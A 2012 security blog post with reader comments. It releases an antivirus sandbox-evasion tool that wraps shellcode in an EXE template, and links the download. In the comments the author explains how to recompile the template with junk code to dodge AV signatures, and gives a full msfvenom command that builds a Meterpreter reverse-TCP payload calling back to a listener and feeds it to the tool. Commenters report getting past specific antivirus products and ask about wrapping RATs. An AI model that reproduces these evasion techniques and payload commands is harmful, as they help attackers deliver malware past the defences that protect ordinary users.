Skip to content

Antivirus Sandbox Evasion (part3) – The Tool

by foip on July 14th, 2012

Ok, here we are..

Thank you for your patience. It is time to release the version 0.1 of the “tool“.. ;-)

The archive is composed of:

  • An EXE template (ultimate-payload-template1.exe) which manage the sandbox evasion.
  • A Perl script (ultimate-payload.pl) which read a shellcode in binary format from STDIN, encode it, and build a new EXE file based on the template.
  • The source code of the encoder (in assembly) and the template (Visual Studio 2008).

The (stupid) sandbox evasion technique used in the EXE template is explained in the part2 of this story. And the output of the tool is shown in part1.

I do not expect it to bypass all AVs forever. I guess new signatures of the template will appear shortly. But don’t worry, all you have to do is to modify the source code of the template,  and recompile it. In case of new sandbox problems, just use your imagination ;-)

Note: this technique doesn’t work anymore against MS Essential Security. For this reason, I wrote a new version (0.2) with a new technique, but this one will not be published.. (yet). However, a little bird told me that using a stupid junk loop in v0.1 would do the trick against Essential Security ;-)

Download the tool: ultimate-payload-v0.1.tar.gz and read the HOWTO.txt file.

As usual, be nice. Ask the permission of the owner before infecting a computer…

Enjoy ;-)

Foip

1 Star2 Stars3 Stars4 Stars5 Stars (6 votes, average: 3.67 out of 5)
Loading...Loading...

© 2012, Fun Over IP. All rights reserved.

16 Comments
  1. WOW,It’s awesome !!!
    I Thought You Might Be Interested
    http://astr0baby.wordpress.com/2012/07/06/viktor-cleaner-1-2

  2. dany permalink

    many,many thanks!!!!

  3. sud0man permalink

    good job !!

  4. Adam permalink

    Well first of all, great job. This bypassed my KIS 2012 successfully.

    I’m new to this thing, so I wanted to ask one thing!
    As of today, 29 July, 2012, there are other AV’s that pick it up.
    So what I want to ask is, you mention “modify the template”, where exactly do I modify it? What piece of code?
    I have a working knowledge of C++ but this code seems advanced.

    • foip permalink

      Hi,

      To bypass the signature detection of your AV, you can add some junk c/c++ code and recompile the template (the source is provided in “src” folder). The goal is only to generate a different EXE file. So, no matter what you add in the code.
      (Of course, this will only work against signature detection)

      Cheers.

  5. Thanks bro …

  6. can i use this to create my exe ?

    bifrost, poison ivy ,etc

    • foip permalink

      It depends. The output of the tool is indeed an EXE file, but the input must be a shellcode in binary format (like msfpayload with raw format). You can’t provide with an EXE file as input.
      Cheers.

  7. Thanks for the quick response

    This means try to use upexec payload with this tool?

    • foip permalink

      Not sure it will work. I guess that the uploaded EXE is written on the disk, which will trigger the anti-virus.

  8. x4r0r permalink

    Hello , that such , are very good your contributions … i will share this papers published in exploit-db.com .., I hope you enjoy …

    http://www.exploit-db.com/wp-content/themes/exploit/docs/20420.pdf

  9. Wuhuuu.. thanks very much for the tools.. its help me to defeat the damn av :P

  10. raz0r permalink

    i know this is probley a stupid question but are you saying we need to change shellcode.h with our payload in binary format please can u pm me on my email

    Regards

    Raz0r

    • foip permalink

      Hi,
      For basic usage, just see the “Usage example” from the HOWTO.txt.
      You just need to pipe your shellcode to the tool like :

      ./msfvenom -p windows/meterpreter/reverse_tcp -f raw LHOST=172.16.99.1 LPORT=2424 | ./ultimate-payload.pl -o /tmp/new_payload.exe -t ultimate-payload-template1.exe

      Because the tool has been published, it is (of course) flagged by some AVs now. So the suggestion is simply to recompile the template and adding some junk code to make the binary different.
      For additional “sandbox” detection tricks, you will be asked to use your imagination :)

      Cheers.

  11. raz0r permalink

    or do we need to edit the template.cpp file ???

    • truk44 permalink

      “…or do we need to edit the template.cpp file ???”

      Yup, that’s correct. For example, just add some drawing code after “BeginPaint” in [case] “WM_PAINT” and then re-compile. I did, and now AVG 2013 doesn’t block the download on my VM, which is running WinXP_SP3 (fully updated) anymore. However, Norton AV is still problematic and will warn the user although it doesn’t tag the .exe as a Trojan.

      Good luck!

Leave a Reply

Note: XHTML is allowed. Your email address will never be published.

Subscribe to this comment feed via RSS


7 − = one

© 2010-2014 Fun Over IP All Rights Reserved -- Copyright notice by Blog Copyright